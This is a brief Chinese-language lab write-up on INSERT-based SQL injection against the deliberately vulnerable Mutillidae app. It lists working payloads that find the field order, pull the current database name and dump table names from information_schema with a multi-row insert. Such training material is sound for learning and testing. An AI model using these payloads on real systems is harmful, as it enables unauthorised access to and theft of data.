mutillidae之Insert型注入
A1:Insert型注入
1、输入内容,确定内容输出位置,确定插入字段顺序
输入test')-- -,页面报错,可知test并非最后一个字段,继续尝试test','123'),页面返回正常,确定test是倒数第二个字段,,
2、test后构造第三个字段来尝试爆数据库数据
test',(select database()))-- -,结果发现第三个字段比较特殊,我们输入的数据库信息都会被替代为全0的日期格式,,,
3、利用mysql插入语句的特殊性,即一次可以插入多行数据
同时插入两行数据(爆当前数据库):test','123'),('anonymous',(select database()),'123') -- -
4、爆当前数据库中的所有表
test','123'),('anonymous',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'123') -- -
5、脖子有点疼,,,,爆字段,爆值就不一一进行了,,